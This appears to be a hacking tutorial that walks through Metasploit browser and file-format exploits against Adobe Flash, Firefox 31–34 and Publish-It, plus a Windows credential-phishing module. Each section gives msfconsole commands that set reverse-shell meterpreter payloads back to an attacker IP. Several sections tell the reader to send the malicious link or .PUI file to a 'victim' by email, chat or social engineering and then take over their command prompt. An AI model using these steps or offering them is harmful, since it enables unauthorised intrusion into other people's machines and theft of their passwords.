Hack Remote Windows PC using Adobe Flash Player Byte Array with Workers Use after Free

This module exploits an use after free vulnerability in Adobe Flash Player. The vulnerability occurs when the ByteArray assigned to the current ApplicationDomain is freed from an ActionScript worker, who can fill the memory and notify the main thread to corrupt the new contents. This module has been tested successfully on Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.296.

Exploit Targets

Windows 7

Flash 16.0.0.296.

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/browser/adobe_flash_worker_byte_array_uaf

msf exploit (adobe_flash_worker_byte_array_uaf)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_worker_byte_array_uaf)>set lhost 192.168.1.11 (IP of Local Host)

msf exploit (adobe_flash_worker_byte_array_uaf)>set srvhost 192.168.1.11

msf exploit (adobe_flash_worker_byte_array_uaf)>set uripath /

msf exploit (adobe_flash_worker_byte_array_uaf)>exploit  

Now an URL you should give to your victim http://192.168.1.11:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link (http://192.168.1.11:8080) a session will be opened as shown below

Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into

Victims command prompt.

Hack Remote Windows PC using Adobe Flash Player Byte Array Uncompress via ZlibVariant Use after Free

This module exploits an use after free vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying to uncompress () a malformed byte stream. This module has been tested successfully on Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and 16.0.0.235.

Exploit Targets

Flash 16.0.0.287

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploitwindows/browser/adobe_flash_uncompress_zlib_uaf

msf exploit (adobe_flash_uncompress_zlib_uaf)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_uncompress_zlib_uaf)>set lhost 192.168.1.9 (IP of Local Host)

msf exploit (adobe_flash_uncompress_zlib_uaf)>set srvhost 192.168.1.9

msf exploit (adobe_flash_uncompress_zlib_uaf)>set uripath /

msf exploit (adobe_flash_uncompress_zlib_uaf)>exploit  

Now an URL you should give to your victim http://192.168.1.9:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link (http://192.168.1.9:8080) a session will be opened as shown below

Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into

Victims command prompt.

Hack Remote Windows, Linux, OSX PC using Firefox Proxy Prototype Privileged JavaScript Injection

This exploit gains remote code execution on Firefox 31-34 by abusing a bug in the XPConnect component and gaining a reference to the privileged chrome:// window. This exploit requires the user to click anywhere on the page to trigger the vulnerability.

Exploit Targets

Firefox 31 to 34

Windows 7

Linux

Solaris

OSX

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/browser/firefox_proxy_prototype

msf exploit (firefox_proxy_prototype)>set payload firefox/shell_reverse_tcp

msf exploit (firefox_proxy_prototype)>set lhost 192.168.1.9 (IP of Local Host)

msf exploit (firefox_proxy_prototype)>set srvhost 192.168.1.9

msf exploit (firefox_proxy_prototype)>set uripath /

msf exploit (firefox_proxy_prototype)>exploit

Now an URL you should give to your victim http://192.168.1.9:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link (http://192.168.1.9:8080) a session will be opened as shown below

Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into

Victims command prompt.

Hack Remote Windows PC using Publish-It PUI Buffer Overflow (SEH)

This module exploits a stack based buffer overflow in Publish-It when processing a specially crafted .PUI file. This vulnerability could be exploited by a remote attacker to execute arbitrary code on the target machine by enticing a user of Publish-It to open a malicious .PUI file.

Exploit Targets

Publish-It

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/fileformat/publishit_pui

msf exploit (publishit_pui)>set payload windows/meterpreter/reverse_tcp

msf exploit (publishit_pui)>set lhost 192.168.1.5 (IP of Local Host)

msf exploit (publishit_pui)>exploit  

After we successfully generate the malicious pui File, it will stored on your local computer

/root/.msf4/local/msf.pui

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.5

exploit

Now send your msf.pui files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer

Hack Remote Windows PC Password using Phishing Login Prompt

This module is able to perform a phishing attack on the target by popping up a loginprompt. When the user fills credentials in the loginprompt, the credentials will be sent to the attacker. The module is able to monitor for new processes and popup a loginprompt when a specific process is starting. Tested on Windows 7.

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use post/windows/gather/phish_windows_credentials

msf exploit (phish_windows_credentials)>set payload windows/meterpreter/reverse_tcp

msf exploit (phish_windows_credentials)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (phish_windows_credentials)>set session 1

msf exploit (phish_windows_credentials)>exploit